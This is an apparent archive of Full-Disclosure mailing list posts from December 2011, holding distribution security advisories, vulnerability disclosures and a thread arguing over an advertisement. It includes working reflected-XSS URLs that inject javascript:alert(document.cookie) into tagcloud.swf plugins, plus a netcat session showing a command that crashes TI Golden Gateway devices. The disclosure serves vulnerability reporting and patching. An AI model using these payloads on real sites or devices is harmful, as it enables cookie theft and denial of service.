[Full-disclosure] [ MDVSA-2011:197 ] php

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:197
 http://www.mandriva.com/security/
 ___

 Package : php
 Date: December 30, 2011
 Affected: 2010.1, 2011.
 ___

 Problem Description:

 Multiple vulnerabilities has been discovered and corrected in php:
 
 Integer overflow in the exif_process_IFD_TAG function in exif.c
 in the exif extension in PHP 5.4.0beta2 on 32-bit platforms allows
 remote attackers to read the contents of arbitrary memory locations or
 cause a denial of service via a crafted offset_val value in an EXIF
 header in a JPEG file, a different vulnerability than CVE-2011-0708
 (CVE-2011-4566).
 
 PHP before 5.3.9 computes hash values for form parameters without
 restricting the ability to trigger hash collisions predictably, which
 allows remote attackers to cause a denial of service (CPU consumption)
 by sending many crafted parameters (CVE-2011-4885).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 a1fbe2b4e30f6fa1f54134f144813fbe  
2010.1/i586/libphp5_common5-5.3.8-0.3mdv2010.2.i586.rpm
 d20c27de0ca773dec4eac226a083dabc  
2010.1/i586/php-bcmath-5.3.8-0.3mdv2010.2.i586.rpm
 3c858464cb0e5fa2bc31ecd7f145917f  
2010.1/i586/php-bz2-5.3.8-0.3mdv2010.2.i586.rpm
 a626a55f83334d53b6324819d2de07c3  
2010.1/i586/php-calendar-5.3.8-0.3mdv2010.2.i586.rpm
 d9393838295a082f8d46866121efd76c  
2010.1/i586/php-cgi-5.3.8-0.3mdv2010.2.i586.rpm
 41ee254c2857a31222baf729c07d  
2010.1/i586/php-cli-5.3.8-0.3mdv2010.2.i586.rpm
 7cad9e9a53eadf3c78ddc125c362ab1f  
2010.1/i586/php-ctype-5.3.8-0.3mdv2010.2.i586.rpm
 8ce7868955aba0d60a3395006fd28036  
2010.1/i586/php-curl-5.3.8-0.3mdv2010.2.i586.rpm
 eb9a84cde5a6f402149ccb4575ebf46f  
2010.1/i586/php-dba-5.3.8-0.3mdv2010.2.i586.rpm
 ddd6c7fbe990fdaec12d5ade422be025  
2010.1/i586/php-devel-5.3.8-0.3mdv2010.2.i586.rpm
 0adeb975f1ec49c2bd4487ebaa75c1c5  
2010.1/i586/php-doc-5.3.8-0.3mdv2010.2.i586.rpm
 f24d4e4c2a5e96f5e76a5788062b585c  
2010.1/i586/php-dom-5.3.8-0.3mdv2010.2.i586.rpm
 7ebe7c3d8cfd1fa63c340cd6259fc196  
2010.1/i586/php-enchant-5.3.8-0.3mdv2010.2.i586.rpm
 4743b302b13438e218740a54f1ee792a  
2010.1/i586/php-exif-5.3.8-0.3mdv2010.2.i586.rpm
 2dd57fa23f2d6b1a9241049c3a6a283f  
2010.1/i586/php-fileinfo-5.3.8-0.3mdv2010.2.i586.rpm
 cd9b0afad6fbe7bb819f405f60ce97ab  
2010.1/i586/php-filter-5.3.8-0.3mdv2010.2.i586.rpm
 ca19675231cca34650979b602832bcf7  
2010.1/i586/php-fpm-5.3.8-0.3mdv2010.2.i586.rpm
 a488ba8ef83cab967a35535837546c53  
2010.1/i586/php-ftp-5.3.8-0.3mdv2010.2.i586.rpm
 ff7bb2597212ae0ff652f3ff7e3999b4  
2010.1/i586/php-gd-5.3.8-0.3mdv2010.2.i586.rpm
 985b0eb766c689ed28090f9617c9612a  
2010.1/i586/php-gettext-5.3.8-0.3mdv2010.2.i586.rpm
 723c95d0033c5ca31407e80bf96f80fb  
2010.1/i586/php-gmp-5.3.8-0.3mdv2010.2.i586.rpm
 347588cf33f6e868de86a23ef340b4b9  
2010.1/i586/php-hash-5.3.8-0.3mdv2010.2.i586.rpm
 d12700ef7a195dc70cd84d181ecc8f57  
2010.1/i586/php-iconv-5.3.8-0.3mdv2010.2.i586.rpm
 0d34442958ae13b80b32eb5e9ae55f4c  
2010.1/i586/php-imap-5.3.8-0.3mdv2010.2.i586.rpm
 d48ed11d713067bf31c44d2f307b47f1  
2010.1/i586/php-ini-5.3.8-0.2mdv2010.2.i586.rpm
 94b2e904d7767d42901f62680190a1ce  
2010.1/i586/php-intl-5.3.8-0.3mdv2010.2.i586.rpm
 dac6fab408346ae491827e4c6145c51a  
2010.1/i586/php-json-5.3.8-0.3mdv2010.2.i586.rpm
 f5369da5d917a706e47e06a86a319cb8  
2010.1/i586/php-ldap-5.3.8-0.3mdv2010.2.i586.rpm
 d451b4bc65e79c1ca8ebeece0b4ea1c7  
2010.1/i586/php-mbstring-5.3.8-0.3mdv2010.2.i586.rpm
 88dc31bea32fc417059dfbf2a29fa1ce  
2010.1/i586/php-mcrypt-5.3.8-0.3mdv2010.2.i586.rpm
 018e3080c373f9a970aac0880b5e5293  
2010.1/i586/php-mssql-5.3.8-0.3mdv2010.2.i586.rpm
 e8c00d4dee45f09d9adc251492a718f1  
2010.1/i586/php-mysql-5.3.8-0.3mdv2010.2.i586.rpm
 bbae98f46152f1f791d83812b825f696  
2010.1/i586/php-mysqli-5.3.8-0.3mdv2010.2.i586.rpm
 0909280e61db71236205744007f257cf  
2010.1/i586/php-odbc-5.3.8-0.3mdv2010.2.i586.rpm
 33895cd5a133d211849b9246690992ea  
2010.1/i586/php-openssl-5.3.8-0.3mdv2010.2.i586.rpm
 e10ebebca0ee4cec8e9d49b2b7ceefa3  
2010.1/i586/php-pcntl-5.3.8-0.3mdv2010.2.i586.rpm
 c0624789da869942f8ab21b3bc4f8372  
2010.1/i586/php-pdo-5.3.8-0.3mdv2010.2.i586.rpm
 9ecea2b4a3c5749c579f7916dd924255  
2010.1/i586/php-pdo_dblib-5.3.8-0.3mdv2010.2.i586.rpm
 962339da5d0547f6f3ae7c87bbb01870  
2010.1/i586/php-pdo_mysql-5.3.8-0.3mdv2010.2.i586.rpm
 fa4703f91b0646e29b7bc7a94c43616c  

[Full-disclosure] [SECURITY] [DSA 2376-1] ipmitool security update

[Thijs Kinkhorst]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2376-1   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
December 30, 2011  http://www.debian.org/security/faq
- -

Package: ipmitool
Vulnerability  : insecure pid file
Problem type   : local
Debian-specific: no
CVE ID : CVE-2011-4339
Debian Bug : 651917

It was discovered that OpenIPMI, the Intelligent Platform Management
Interface library and tools, used too wide permissions PID file,
which allows local users to kill arbitrary processes by writing to
this file.

For the stable distribution (squeeze), this problem has been fixed in
version 1.8.11-2+squeeze2.

For the unstable distribution (sid), this problem has been fixed in
version 1.8.11-5.

We recommend that you upgrade your ipmitool packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJO/Wc/AAoJEOxfUAG2iX57/aEIAI7UnI1v9h9vQVZ4tHF93TQC
RXDdTyLH1cu2AWGb416oSmLwHCKp2GvwihLwHmtUX4OJu21gChfHr7wkZZy2xNVg
qcisZ2zxa66rzg3jFkhC8D9bYbcVIQhC33RwOPxuQngybun+haqPELLuFT6ZXEhz
eTt2rf6/kd1MmZ23wlL+DMgSSqr0up04nj6pZS8Bo7theKZRw2ds6ezWRyhJquP6
uiTuyBVXqEFSyHsdvI93/zXs1g02ltuFztt12pnPaZzu3D1UtRItYX1ylhP5osie
VVOC2Nz4zNDFUun5zrEffcIHPCgD4KMhOJU9f/dENMELcV5eVEm1e1tCrBjojiY=
=DrU8
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2263-2] movabletype-opensource security update

[Thijs Kinkhorst]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2263-2   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
December 30, 2011  http://www.debian.org/security/faq
- -

Package: movabletype-opensource
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : not yet available
Debian Bug : 627936

Advisory DSA 2363-1 did not include a package for the Debian 5.0 'Lenny'
suite at that time. This update adds that package. The original advisory
text follows.

It was discovered that Movable Type, a weblog publishing system,
contains several security vulnerabilities:

A remote attacker could execute arbitrary code in a logged-in users'
web browser.

A remote attacker could read or modify the contents in the system
under certain circumstances.

For the oldstable distribution (lenny), these problems have been fixed in
version 4.2.3-1+lenny3.

For the stable distribution (squeeze), these problems have been fixed in
version 4.3.5+dfsg-2+squeeze2.

For the testing distribution (wheezy) and for the unstable
distribution (sid), these problems have been fixed in version
4.3.6.1+dfsg-1.

We recommend that you upgrade your movabletype-opensource packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJO/W15AAoJEOxfUAG2iX579YAH/iHvmSvkzHQj5mrg48eEw8XI
RCWvrYvCmnvPSJWia0c0p66KuncfABjWO3vN2MQR231TYlFH1UXGhwDQ6pyIxM9S
jjvxmpoJD3DJm9VDlviSJfUulz9f47xyNbOMnB1griTlueOotYZR98B3MnbYzaB/
hemCTK7eC5tHgUj2LK3iVClmmL+OL9ykhFT7gYwJ+k4SX7zh82jrvghzktFoM9RV
nbsVx6uqI341SVIuM/hbDuIHhWnobSPZyEcGEXoU1YcojezwLz/HMyEm929OsWTl
t0SurJvEEGvSQwiIO1cp0/S9txZZtuZQrLFpnFBdnC5YFihdM8TQN2sIZ0y3izA=
=E15M
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Winn Guestbook v2.4.8c Stored XSS

[tom]

# Exploit Title: Winn Guestbook v2.4.8c Stored XSS
# Date: 12/29/11
# Author: G13
# Software Link: http://code.google.com/p/winn-guestbook/, 
http://www.winn.ws
# Version: 2.4.8c
# Category: webapps (php)
# CVE: 2011-5026

# Vulnerability #

There is no sanitation on the input of the name variable. This allows 
malicious scripts to be added. This is a stored XSS.

# Vendor Notification #

12/24/11 - Vendor Notified.
12/27/11 - Vendor Acknowledged, Patch Issued.

# Resolution #

Upgrade to Version 2.4.8d

# Affected Variables #

name=[XSS]

# Exploit #

The script can be added right in the page, there is no filtering of 
input. This can easily be exploited if the email address used is added 
to the approved posters list.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] DoS in TI Golden Gateway MXP Debug Application

[will]

###

 Will Urbanski

Application:Texas Instruments Golden Gateway MXP Debug Application
http://www.ti.com

Vuln ID:SHR20111201

Version:2007

Platforms:  Embedded (tested on SMC D3GNV Cable Modem)

Bug:input sensitization DoS vuln in `show rtcp_info`

Exploitation:   remote
Date:   01 Dec 2011
Author: Will Urbanski
e-mail: will () shakingrock com
permalink:  http://www.shakingrock.com/vulns/SHR20111201.txt


###


1) Introduction
2) `show rctp_info`
3) Impact
4) Workaround


###

===
1) Introduction
===

From vendor's homepage:
Golden Gateway® software is designed to run on Texas Instruments (TI) Digital 
Signal Processors (DSPs). The software, which powers voice, fax and data modem 
transmission over the Internet, is inside products made by industry leaders 
such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and 
data communications equipment manufacturers. 

###

==
2) `show rctp_info`
==

Executing `show rctp_info 1` results in system failure due to a critical 
process being terminated. The show command is normally used to display system 
information and should not result in application termination.

$ nc 172.16.1.1 4159
��
��!��
��Texas Instruments Inc. 2007
Golden Gateway Remote Command Processor
MXPshow version
show version
XGCP Version: 2.7.0
CM Version Label: 2.7.0
[...]
MXPshow rtcp_info 1
show rtcp_info 1
MXPsigterm_prog=0;calling vp880_restart

The DoS can be initiated remotely by simply sending show rtcp_info 1 to the 
MXP shell. During some of our tests we were unable to regain internet 
connectivity until the device had been unplugged. In the event that 
connectivity is restored spamming show rtcp_info 1 to the MXP shell will 
ensure the device stays offline.


###

===
3) Impact
===

As mentioned on the vendors site the Golden Gateway Remote Command Processor 
MXP Debug Application is included in many embedded networking devices. The 
software, which powers voice, fax and data modem transmission over the 
Internet, is inside products made by industry leaders such as Cisco Systems, 
3Com, Nortel Networks and many other leading voice and data communications 
equipment manufacturers. This remote denial of service was discovered in an 
SMC D3GNV DOCSIS 3.0 Multimedia Voice Gateway which provides voice, wifi, and 
cable internet capabilities. This vulnerability _may_ be found on any device 
that allows unauthenticated access to the MXP Debug Application shell.


###

==
4) Workaround
==

Restrict access to port tcp/4159 on devices that are allowing unauthenticated 
access to the MXP Debug Application.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SEC Consult SA-20111230-0 :: Critical authentication bypass in Microsoft ASP.NET Forms - CVE-2011-3416

[SEC Consult Vulnerability Lab]

SEC Consult Vulnerability Lab Security Advisory  20111230-0 
===
  title: Microsoft ASP.NET Forms Authentication Bypass
product: Microsoft .NET Framework
 vulnerable version: Microsoft .NET Framework Version:4.0.30319; 
 ASP.NET Version:4.0.30319.237 and below
  fixed version: MS11-100
CVE: CVE-2011-3416
 impact: critical
   homepage: http://www.microsoft.com/net
  found: 2011-10-02
 by: K. Gudinavicius / SEC Consult Vulnerability Lab 
 m. / SEC Consult Vulnerability Lab
 https://www.sec-consult.com 
===

Vendor description:
---
.NET is an integral part of many applications running on Windows and
provides common functionality for those applications to run. This
download is for people who need .NET to run an application on their
computer. For developers, the .NET Framework provides a comprehensive
and consistent programming model for building applications that have
visually stunning user experiences and seamless and secure
communication.

Source: http://www.microsoft.com/net



Vulnerability overview/description:
---
The null byte termination vulnerability exists in the
CopyStringToUnAlingnedBuffer() function of the webengine4.dll library
used by the .NET framework. The unicode string length is determined
using the lstrlenW function. The lstrlenW function returns the length
of the string, in characters not including the terminating null
character. If the unicode string containing a null byte is passed, its
length is incorrectly calculated, so only characters before the null
byte are copied into the buffer.

This vulnerability can be leveraged into an authentication bypass
vulnerability. Microsoft ASP.NET membership system depends on the
FormsAuthentication.SetAuthCookie(username, false) method for certain
functionality. By exploiting this vulnerability an attacker is able to
log on as a different existing user with all the privileges of the
targeted user (e.g. admin).



Proof of concept:
-

Detailed exploit information and source code references have been
removed from this advisory.

An attacker is able to bypass authentication in certain functionality
using null bytes and log on as another user, e.g. admin.


Vulnerable / tested versions:
-
The vulnerability has been verified to exist in Microsoft .NET Framework
Version:4.0.30319; ASP.NET Version:4.0.30319.237, which was the most
recent version at the time of discovery.

More information regarding affected versions is available within the
advisory of Microsoft:
http://technet.microsoft.com/en-us/security/bulletin/ms11-100


Vendor contact timeline:

2011-10-07: Contacted vendor through sec...@microsoft.com
2011-10-07: Vendor response, MSRC 11838
2011-10-14: Contacted MSRC asking for status
2011-10-15: Answer from case manager: the vulnerability will be
addressed through a security bulletin, a timeframe is
unknown.
2011-11-23: Contacted MSRC asking for status
2011-11-23: Answer from case manager: a release date of update is
unknown, best guess would be a month before or after the
March (2012) update cycle
2011-12-29: Microsoft publishes out-of-band security patch MS11-100
which also addresses this vulnerability
2011-12-30: SEC Consult releases redacted version of advisory due to
criticality of this issue

SEC Consult will release a more detailed advisory at a later date.



Solution:
-
Immediately apply the MS11-100 patch:
http://technet.microsoft.com/en-us/security/bulletin/ms11-100


Workaround:
---
In .NET 4.0 the vulnerability can be mitigated by setting the
ticketCompatibilityMode attribute in the application or global
web.config file like this:

system.web
  authentication mode=Forms
forms ticketCompatibilityMode=Framework40 /
  /authentication
/system.web



Advisory URL:
-
https://www.sec-consult.com/en/advisories.html


~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF K. Gudinavicius, J. Greil / @2011

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in plugins for MODx CMS, XOOPS, uCoz, Magento and DSP CMS

[MustLive]

Hello Antony!

You are welcome.

All those XSS vulnerabilities in 34 millions flash files, and all those 
vulnerable plugins for different engines with vulnerable swf-file, which 
I've wrote about during 2010-2011, including last five plugins, and those 
vulnerabilities in TinyMCE (on tens millions of web sites, only on WordPress 
there are more then 67 millions of affected web sites), and all those 
vulnerabilities disclosed by me in 2011, and that new version of plugin 
Register Plus Redux (with fixed all holes), which I wrote about in the last 
advisory - all these are my presents. So Merry Christmas and Happy New Year!

Of course I wish good music for everyone for holidays. Like this one: 
http://soundcloud.com/mustlive/mega-mix-4

Best wishes  regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message - 
From: Antony widmal
To: MustLive
Cc: submissi...@packetstormsecurity.org ; full-disclosure@lists.grok.org.uk
Sent: Tuesday, December 27, 2011 12:44 AM
Subject: Re: [Full-disclosure] Vulnerabilities in plugins for MODx CMS, 
XOOPS, uCoz, Magento and DSP CMS


10 million XSS !


Thank you Santa.





2011/12/26 MustLive mustl...@websecurity.com.ua

Hello list!

Besides tens millions of vulnerable web sites with affected flash files and
vulnerable multiple plugins for different engines, which I've wrote about
earlier, there are a lot of other vulnerable plugins. Here are new ones
(some of them are vulnerable to two XSS holes). There are Cross-Site
Scripting vulnerabilities in plugins for engines MODx CMS, XOOPS, uCoz,
Magento and DSP CMS, which all are ports of WP-Cumulus. A lot of other such
plugins for other engines can be vulnerable.

This XSS is similar to XSS vulnerability in WP-Cumulus, which I've disclosed
in 2009 (http://securityvulns.com/Wdocument842.html). Because these plugins
are using tagcloud.swf made by author of WP-Cumulus. About such
vulnerabilities I wrote in 2009-2011, particularly about millions of flash
files tagcloud.swf which are vulnerable to XSS attacks I mentioned in my
article XSS vulnerabilities in 34 millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).

-
Affected products:
-

Vulnerable are all versions of Tagcloud for MODx CMS.

Vulnerable is Сumulus for XOOPS 1.0, which is also included in
ExtendedPackRU for XOOPS.

Vulnerable are all versions of uCoz-Cumulus for uCoz.

Vulnerable are all versions of Cumulus Tagcloud for Magento.

Vulnerable are all versions of Сumulus for DSP CMS.

Some of these plugins are vulnerable to one and some to two XSS holes - as
to first hole in WP-Cumulus, which I've disclosed in 2009, as to second
hole, which I've disclosed in 2011.

Besides these ones and those which I've disclosed in 2009-2011, a lot of
other such plugins for other engines can be vulnerable.

--
Details:
--

XSS (WASC-08):

Tagcloud for MODx CMS:

http://site/assets/files/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Сumulus for XOOPS:

http://site/modules/cumulus/include/cumulus.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

uCoz-Cumulus for uCoz:

http://site/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Cumulus Tagcloud for Magento:

http://site/frontend/tag/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml

http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml

Via parameters mode and xmlpath.

Сumulus for DSP CMS:

http://site/engine/tags/cumulus.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS
(http://websecurity.com.ua/5476/). Also it's possible to conduct (like in
WP-Cumulus) HTML Injection attack.

-
Plugins with fixed version of swf-file:
-

Because in November 2009, after my informing, Roy Tanck (developer of
WP-Cumulus) fixed only XSS vector, but not HTML Injection vector, it's still
possible to conduct HTML Injection attacks (for injecting arbitrary links)
to all versions of this swf-file (which can be found under name tagcloud.swf
and other names). Including fixed version of the swf-file, with fixed XSS
hole.

So all those plugins, which developers fixed this vulnerability (after my
informing or by informing from Roy or other people) by updating swf-file,
are still vulnerable to HTML Injection. 

[Full-disclosure] INSECT Pro - Version 3.0 Released!

[runlvl]

Great news!!! This 2012 we released the new version of INSECT PRO

INSECT Pro 3.0 - Ultimate is here! This penetration security auditing
and testing software solution is designed to allow organizations of
all sizes mitigate, monitor and manage the latest security threats
vulnerabilities and implement active security policies by performing
penetration tests across their infrastructure and applications.

Promotional price: 50 u$d!

Get your copy now! From here: http://insecurityresearch.com

http://www.youtube.com/watch?v=4txmfeWKaxAfeature=player_embedded

Insecurity Research Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro - Version 3.0 Released!

[Gage Bystrom]

Seriously, what the fuck is wrong with you? How many times have you been
told that full disclosure is not the place for advertising your piece of
shit software?
On Dec 30, 2011 4:43 PM, runlvl run...@gmail.com wrote:

 Great news!!! This 2012 we released the new version of INSECT PRO

 INSECT Pro 3.0 - Ultimate is here! This penetration security auditing
 and testing software solution is designed to allow organizations of
 all sizes mitigate, monitor and manage the latest security threats
 vulnerabilities and implement active security policies by performing
 penetration tests across their infrastructure and applications.

 Promotional price: 50 u$d!

 Get your copy now! From here: http://insecurityresearch.com

 http://www.youtube.com/watch?v=4txmfeWKaxAfeature=player_embedded

 Insecurity Research Team

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro - Version 3.0 Released!

[root]

The presentation video is actually quite nice. Maybe you should
diversify your business into graphical design.

On 12/30/2011 09:37 PM, runlvl wrote:
 Great news!!! This 2012 we released the new version of INSECT PRO
 
 INSECT Pro 3.0 - Ultimate is here! This penetration security auditing
 and testing software solution is designed to allow organizations of
 all sizes mitigate, monitor and manage the latest security threats
 vulnerabilities and implement active security policies by performing
 penetration tests across their infrastructure and applications.
 
 Promotional price: 50 u$d!
 
 Get your copy now! From here: http://insecurityresearch.com
 
 http://www.youtube.com/watch?v=4txmfeWKaxAfeature=player_embedded
 
 Insecurity Research Team
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/